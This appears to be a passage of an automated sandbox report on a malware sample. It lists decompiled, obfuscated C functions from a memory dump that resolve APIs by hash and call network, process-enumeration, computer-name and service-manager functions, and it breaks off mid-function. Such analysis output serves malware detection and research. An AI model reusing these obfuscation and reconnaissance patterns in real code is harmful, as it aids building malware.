                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E002275AE(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t43;
                                                      				intOrPtr* _t51;
                                                      				void* _t52;
                                                      				signed int _t54;
                                                      				signed int _t55;
                                                      				void* _t63;
                                                      				void* _t64;
                                                      
                                                      				_t64 = __edx;
                                                      				E0022602B(_t43);
                                                      				_v8 = 0x98b5;
                                                      				_v8 = _v8 >> 9;
                                                      				_t54 = 0x5f;
                                                      				_v8 = _v8 / _t54;
                                                      				_v8 = _v8 + 0xffff1c63;
                                                      				_v8 = _v8 ^ 0xffff635b;
                                                      				_v12 = 0x5016;
                                                      				_v12 = _v12 + 0xffff6b9b;
                                                      				_t55 = 0x41;
                                                      				_v12 = _v12 / _t55;
                                                      				_v12 = _v12 ^ 0x03f03403;
                                                      				_t51 = E002307A9(0x93576eb5, 0x12e6675d, _t55, _t55, 0x110);
                                                      				_t52 =  *_t51(_a36, _a12, _t64, _a20, _a32, 0, _a8, _a24, __ecx, __edx, 0, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _t63, __ecx, __ecx); // executed
                                                      				return _t52;
                                                      			}













                                                      APIs
                                                      • CryptDecodeObjectEx.CRYPT32(00001A16,3FEE891D,00000000,FFFF309F,FEFFE01A,00000000,?,01C46047), ref: 0022765C
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CryptDecodeObject
                                                      • String ID:
                                                      • API String ID: 1207547050-0
                                                      • Opcode ID: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                                      • Instruction ID: e437d75b70e5e4b9246334512e3159ceb92c75827ee3caf358b936d0520d8b4a
                                                      • Opcode Fuzzy Hash: 48f2b61483b0afb25e5a152f65d42c1f563eb6edafd256c2ccbd9b0086fc00f6
                                                      • Instruction Fuzzy Hash: 1621067290060CFFDF06CF94DC46DDE7F76EB08324F148148FA18662A0D7B29A61AB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 71%
                                                      			E0022109C(void* __ecx, WCHAR* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t30;
                                                      				void* _t38;
                                                      				signed int _t40;
                                                      				WCHAR* _t46;
                                                      
                                                      				_push(_a16);
                                                      				_t46 = __edx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				E0022602B(_t30);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0xf19a8;
                                                      				_v20 = 0x58c643;
                                                      				_v12 = 0xbcc6;
                                                      				_v12 = _v12 | 0xbb59ffff;
                                                      				_v12 = _v12 ^ 0xbb59839d;
                                                      				_v8 = 0x5dbd;
                                                      				_v8 = _v8 << 0xd;
                                                      				_t40 = 0x3f;
                                                      				_v8 = _v8 / _t40;
                                                      				_v8 = _v8 * 0x1f;
                                                      				_v8 = _v8 ^ 0x05c44d1b;
                                                      				E002307A9(0xce5de7ff, 0x9164b7cc, _t40, _t40, 0x264);
                                                      				_t38 = FindFirstFileW(_t46, _a4); // executed
                                                      				return _t38;
                                                      			}













                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,BB59839D), ref: 0022112B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                                      • Instruction ID: 5e5631b204e9bd9d8a323f68259367820e8be34550aa1f871d1c1f35557cac91
                                                      • Opcode Fuzzy Hash: 0fd23be9f3eba847a5a9bdd4d091bd485d62c5ec83e6e683a4ca1e9cfb5b8d80
                                                      • Instruction Fuzzy Hash: 47115BB5D01218FBDF04EFA8D9499DEBFB5EF44314F208098E90467251D7B14B249F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E00221C88(int _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t28;
                                                      				signed int _t29;
                                                      
                                                      				_v28 = 0x4309a9;
                                                      				asm("stosd");
                                                      				_t29 = 0x31;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v12 = 0x7af7;
                                                      				_v12 = _v12 + 0x2003;
                                                      				_v12 = _v12 ^ 0x000083a5;
                                                      				_v8 = 0xa138;
                                                      				_v8 = _v8 << 8;
                                                      				_v8 = _v8 / _t29;
                                                      				_v8 = _v8 ^ 0x00030e85;
                                                      				E002307A9(0xf2bcf6a3, 0x9164b7cc, _t29, _t29, 0x45);
                                                      				_t28 = CreateToolhelp32Snapshot(_a12, 0); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(?,00000000), ref: 00221CF3
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateSnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3332741929-0
                                                      • Opcode ID: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                                      • Instruction ID: 8408af1fea648d5affc68213bd768b0b0444e044796688f47f5a9b5b31ab24b0
                                                      • Opcode Fuzzy Hash: ea0f0127b5065ca251a00853203831dc196477c93da7ac2d986631f05f845638
                                                      • Instruction Fuzzy Hash: D1F03171E11208BBFB04DFA8CD4669EFBB5EF94704F208099E50067291D7F55F158B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 42%
                                                      			E00225A52(WCHAR* __ecx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, long _a24) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t25;
                                                      				void* _t31;
                                                      				WCHAR* _t37;
                                                      
                                                      				_t37 = __ecx;
                                                      				_push(0);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(__ecx);
                                                      				E0022602B(_t25);
                                                      				_v28 = 0x354aea;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_v8 = 0x4733;
                                                      				_v8 = _v8 << 0xb;
                                                      				_v8 = _v8 + 0xffffa4b2;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x00006f5b;
                                                      				_v12 = 0x6e5;
                                                      				_v12 = _v12 ^ 0x21b9cf62;
                                                      				_v12 = _v12 ^ 0x21b9d5f6;
                                                      				E002307A9(0xfc7e7fb7, 0x1f801b8, __ecx, __ecx, 0x1ad);
                                                      				_t31 = InternetOpenW(_t37, _a24, 0, 0, 0); // executed
                                                      				return _t31;
                                                      			}











                                                      APIs
                                                      • InternetOpenW.WININET(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0CD25E5E), ref: 00225AE1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InternetOpen
                                                      • String ID: e list for clipped items$J5
                                                      • API String ID: 2038078732-2011309526
                                                      • Opcode ID: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                                      • Instruction ID: 4de38bbca2c5ad14f561295e45529feb0f0daf69c74b7dee5943e3cb7f3905ae
                                                      • Opcode Fuzzy Hash: 7c15cf55018e347f4ace21a93f9c9c926ac753e269a0466785618c49b19088fb
                                                      • Instruction Fuzzy Hash: 18113CB290060CBFEB05DF98DD859DFBB79EF14358F104098FA0562120D3B68F659BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E00237955(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, WCHAR* _a36, void* _a44, intOrPtr _a52) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				WCHAR* _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t41;
                                                      				short _t47;
                                                      
                                                      				_push(_a52);
                                                      				_t47 = __ecx;
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(0);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(0);
                                                      				_push(_a4);
                                                      				_push(__ecx & 0x0000ffff);
                                                      				E0022602B(__ecx & 0x0000ffff);
                                                      				_v24 = 0x1f9770;
                                                      				_v20 = 0x380697;
                                                      				_v16 = 0;
                                                      				_v12 = 0x6440;
                                                      				_v12 = _v12 * 0xf;
                                                      				_v12 = _v12 * 0x65;
                                                      				_v12 = _v12 ^ 0x02513e1b;
                                                      				_v8 = 0x9d26;
                                                      				_v8 = _v8 << 0xa;
                                                      				_v8 = _v8 ^ 0x42bae3e2;
                                                      				_v8 = _v8 + 0x19dc;
                                                      				_v8 = _v8 ^ 0x40ce99cc;
                                                      				E002307A9(0x73a58955, 0x1f801b8, __ecx, __ecx, 0x1fa);
                                                      				_t41 = InternetConnectW(_a44, _a36, _t47, 0, 0, _a32, 0, 0); // executed
                                                      				return _t41;
                                                      			}











                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,00000000,00000000,?,00000000,00000000), ref: 00237A07
                                                      Strings
                                                      • e list for clipped items, xrefs: 0023799B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ConnectInternet
                                                      • String ID: e list for clipped items
                                                      • API String ID: 3050416762-922771492
                                                      • Opcode ID: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                                      • Instruction ID: 174ac6a0025630c5a4b58eb26ae57f67e557bed5730471b30b5aef71548e4331
                                                      • Opcode Fuzzy Hash: a5cc7dfa8e1f578d9882cc34f057ad90facde6536c1dd8886fbecc1955af6ef0
                                                      • Instruction Fuzzy Hash: FC212472800248BBCF119F92CD49CDFBFB9FF89718F108199F90566220D7719A60EB60
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00222959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t30;
                                                      				void* _t39;
                                                      				signed int _t41;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E0022602B(_t30);
                                                      				_v12 = 0x5e3c;
                                                      				_t41 = 0x63;
                                                      				_v12 = _v12 / _t41;
                                                      				_t42 = 0x2f;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x000064be;
                                                      				_v8 = 0x74da;
                                                      				_v8 = _v8 | 0xfefeeaea;
                                                      				_v8 = _v8 >> 0xc;
                                                      				_v8 = _v8 ^ 0x000fb531;
                                                      				E002307A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
                                                      				_t39 = OpenSCManagerW(0, 0, _a16); // executed
                                                      				return _t39;
                                                      			}










                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 002229DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ManagerOpen
                                                      • String ID: <^
                                                      • API String ID: 1889721586-3203995635
                                                      • Opcode ID: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                                      • Instruction ID: 37b4d298cd155c94a1be96190f1608c22ec2d5d7dc8241c68084df23160ea007
                                                      • Opcode Fuzzy Hash: c55c8693578de0a15b64fe4e162e7219b95c9f74affb71a64b93f36a3bebe02f
                                                      • Instruction Fuzzy Hash: E5016D72A00108BFEB14DF95DC4A8DFBFB6EF44310F108088F508A6250D7B69F619B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0022C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				intOrPtr _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t29;
                                                      				intOrPtr* _t33;
                                                      				void* _t34;
                                                      
                                                      				E0022602B(_t29);
                                                      				_v28 = 0x4fe02f;
                                                      				_v24 = 0x232390;
                                                      				_v20 = 0xf8460;
                                                      				_v16 = 0;
                                                      				_v12 = 0xf625;
                                                      				_v12 = _v12 >> 6;
                                                      				_v12 = _v12 >> 0xa;
                                                      				_v12 = _v12 + 0xffffcc6f;
                                                      				_v12 = _v12 ^ 0xffffa5b6;
                                                      				_v8 = 0xe5cd;
                                                      				_v8 = _v8 + 0xffffae4d;
                                                      				_v8 = _v8 | 0xf8bbefe7;
                                                      				_v8 = _v8 ^ 0xf8bbcc9a;
                                                      				_t33 = E002307A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
                                                      				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
                                                      				return _t34;
                                                      			}













                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0022C762
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FolderPath
                                                      • String ID: /O
                                                      • API String ID: 1514166925-1923427199
                                                      • Opcode ID: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                                      • Instruction ID: 9aff3a284bdbc7005846512a2e192847c3488d4c6c202e5d49d862151a6953d0
                                                      • Opcode Fuzzy Hash: 30da3a07f34f73dd2d7e05b570dca88aea51d71bd043760bee17983db85881fe
                                                      • Instruction Fuzzy Hash: 711133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3B14B659BE0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00238422(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8, void* _a12, long _a16, intOrPtr _a24, void* _a28) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t33;
                                                      				int _t40;
                                                      
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0xffffffff);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0022602B(_t33);
                                                      				_v20 = _v20 & 0x00000000;
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v28 = 0x2f14d8;
                                                      				_v24 = 0x27cc4d;
                                                      				_v8 = 0xcfda;
                                                      				_v8 = _v8 << 7;
                                                      				_v8 = _v8 * 0x1b;
                                                      				_v8 = _v8 ^ 0xd01d7588;
                                                      				_v8 = _v8 ^ 0xdae8f2b7;
                                                      				_v12 = 0x64c6;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x001c0252;
                                                      				E002307A9(0x234ee083, 0x1f801b8, __ecx, __ecx, 0x11c);
                                                      				_t40 = HttpSendRequestW(_a12, _a8, 0xffffffff, _a28, _a16); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • HttpSendRequestW.WININET(00000000,00000000,000000FF,?,0027CC4D), ref: 002384BE
                                                      Strings
                                                      • e list for clipped items, xrefs: 0023844E
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HttpRequestSend
                                                      • String ID: e list for clipped items
                                                      • API String ID: 360639707-922771492
                                                      • Opcode ID: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                                      • Instruction ID: 746990952968a466e81c6f81cee0d18d9426a99179eb708c2e3a05ea667d4097
                                                      • Opcode Fuzzy Hash: f6379289a10fe4900e83e69250910bd8ee8d1d9b0766bbc90ede220326e709f7
                                                      • Instruction Fuzzy Hash: 921119B180120DFFCF05DF94CD4599EBF75BB44314F208288F91466291C3768B249B90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0022F74E(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t28;
                                                      				intOrPtr* _t35;
                                                      				void* _t36;
                                                      				signed int _t38;
                                                      				void* _t44;
                                                      				void* _t45;
                                                      
                                                      				_t45 = __edx;
                                                      				E0022602B(_t28);
                                                      				_v8 = 0x515c;
                                                      				_v8 = _v8 + 0xc7b4;
                                                      				_t38 = 0xc;
                                                      				_v8 = _v8 / _t38;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 ^ 0x000000a5;
                                                      				_v12 = 0xe7ac;
                                                      				_v12 = _v12 * 3;
                                                      				_v12 = _v12 ^ 0xe245e609;
                                                      				_v12 = _v12 ^ 0xe24720e8;
                                                      				_t35 = E002307A9(0xea0af15d, 0x7a94c48d, _t38, _t38, 0x20);
                                                      				_t36 =  *_t35(0, _t45, _a4, 0, __edx, _a4, _a8, _a12, _a16, _t44, __ecx, __ecx); // executed
                                                      				return _t36;
                                                      			}












                                                      APIs
                                                      • ObtainUserAgentString.URLMON(00000000,00000000,E24720E8), ref: 0022F7D1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AgentObtainStringUser
                                                      • String ID: G
                                                      • API String ID: 2681117516-4236931613
                                                      • Opcode ID: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                                      • Instruction ID: 50358eb4719f15bb8ae9254565d7af0b36ffe565fa352db5e139077aefef3050
                                                      • Opcode Fuzzy Hash: 70969eb82c61d59ffbc36551d611cf02090b92ff9991390446fddbbc1e7583c1
                                                      • Instruction Fuzzy Hash: 65015771900208FBEB04DFA4DD4AA9EBFB5EF84310F208088F50866290E6B15B20DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E002276F7(struct tagPROCESSENTRY32W* __ecx, void* __edx, intOrPtr _a4, void* _a8) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t28;
                                                      				void* _t35;
                                                      				signed int _t37;
                                                      				struct tagPROCESSENTRY32W* _t43;
                                                      
                                                      				_push(_a8);
                                                      				_t43 = __ecx;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0022602B(_t28);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x5756b4;
                                                      				_v20 = 0x17430f;
                                                      				_v12 = 0x6271;
                                                      				_t37 = 0x43;
                                                      				_v12 = _v12 / _t37;
                                                      				_v12 = _v12 ^ 0x00004051;
                                                      				_v8 = 0x9292;
                                                      				_v8 = _v8 + 0x9a70;
                                                      				_v8 = _v8 << 0xb;
                                                      				_v8 = _v8 * 0x3d;
                                                      				_v8 = _v8 ^ 0x3dcb9719;
                                                      				_t35 = E002307A9(0x5538536e, 0x9164b7cc, _t37, _t37, 0x1b8);
                                                      				Process32FirstW(_a8, _t43); // executed
                                                      				return _t35;
                                                      			}













                                                      APIs
                                                      • Process32FirstW.KERNEL32(00000000,?,?,?,?,?,?,?,00000BF7), ref: 00227780
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FirstProcess32
                                                      • String ID: nS8U
                                                      • API String ID: 2623510744-2564412997
                                                      • Opcode ID: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                                      • Instruction ID: 79244adceab87efe14280bbff0486605b759cf87e297d259b2eb4aeebbfdfa10
                                                      • Opcode Fuzzy Hash: 753496f1b75fe5d5e09ae3fe2fb076b385ae7b42944af084fd65dc5bf96fddcd
                                                      • Instruction Fuzzy Hash: 1E0125B5D01218FBEB04DFA4D90A9EEBFB5EF40314F208099E8186B251E7B55B249B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00221000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				void* _t33;
                                                      				struct HINSTANCE__* _t40;
                                                      				signed int _t42;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E0022602B(_t33);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v24 = 0x1b2eda;
                                                      				_v20 = 0x33a3b7;
                                                      				_v12 = 0x98c;
                                                      				_v12 = _v12 + 0xb426;
                                                      				_v12 = _v12 + 0x5beb;
                                                      				_t42 = 0x63;
                                                      				_v12 = _v12 / _t42;
                                                      				_v12 = _v12 ^ 0x00000fce;
                                                      				_v8 = 0x120e;
                                                      				_v8 = _v8 + 0xfffffcb8;
                                                      				_v8 = _v8 + 0xffffefaa;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 ^ 0x07ff9a02;
                                                      				E002307A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
                                                      				_t40 = LoadLibraryW(_a12); // executed
                                                      				return _t40;
                                                      			}












                                                      APIs
                                                      • LoadLibraryW.KERNEL32(0033A3B7), ref: 00221096
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID: [
                                                      • API String ID: 1029625771-3431493590
                                                      • Opcode ID: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                                      • Instruction ID: 9b0b4243c09f153743ba963f172af61627f32187394d3e2d1bec8dfbc1c5dfe0
                                                      • Opcode Fuzzy Hash: 73a3d58754cdd9a79437ead089af7a0f70b398c09ce0aea4ead113eb7dba5844
                                                      • Instruction Fuzzy Hash: 8C015BB6D01308BBDF04DFA4C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0022602C(void* __ecx, CHAR* __edx, DWORD* _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				signed int _v16;
                                                      				intOrPtr _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t23;
                                                      				int _t29;
                                                      				CHAR* _t34;
                                                      
                                                      				_push(_a8);
                                                      				_t34 = __edx;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0022602B(_t23);
                                                      				_v16 = _v16 & 0x00000000;
                                                      				_v28 = 0x56a9ae;
                                                      				_v24 = 0x46a5f8;
                                                      				_v20 = 0x71462f;
                                                      				_v8 = 0x2cb4;
                                                      				_v8 = _v8 + 0xdc6b;
                                                      				_v8 = _v8 * 0x25;
                                                      				_v8 = _v8 ^ 0x0026370c;
                                                      				_v12 = 0x2021;
                                                      				_v12 = _v12 ^ 0x8c534c3d;
                                                      				_v12 = _v12 ^ 0x8c530eb3;
                                                      				E002307A9(0xbd983dde, 0x9164b7cc, __ecx, __ecx, 0x16f);
                                                      				_t29 = GetComputerNameA(_t34, _a4); // executed
                                                      				return _t29;
                                                      			}













                                                      APIs
                                                      • GetComputerNameA.KERNEL32(?,8C530EB3,?,?,?,?,?,?,0000007A), ref: 002260B2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ComputerName
                                                      • String ID: /Fq
                                                      • API String ID: 3545744682-1299280358
                                                      • Opcode ID: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                                      • Instruction ID: 05d6f1db6c618502e268fd00a24aabbbe5fb638ec44fb1f390ddb9fecbb1d508
                                                      • Opcode Fuzzy Hash: d2b01d404bd79484d67768b9f36fce1e26be8233a3316e4eaad5ede2e67fc524
                                                      • Instruction Fuzzy Hash: B5011AB5C1121CBBDB04EFE4D94A9EEBFB4EF41314F108189E8086B251D3B54B649F91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E0022595A(void* __ecx, void* __edx, struct _WIN32_FIND_DATAW* _a4, intOrPtr _a8) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				int _t27;
                                                      				void* _t33;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a8);
                                                      				_t33 = __edx;
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0022602B(_t22);
                                                      				_v8 = 0xecfb;
                                                      				_v8 = _v8 >> 5;
                                                      				_v8 = _v8 + 0x8346;
                                                      				_v8 = _v8 + 0xffffe2f9;
                                                      				_v8 = _v8 ^ 0x000008ac;
                                                      				_v12 = 0x34e0;
                                                      				_v12 = _v12 >> 0xf;
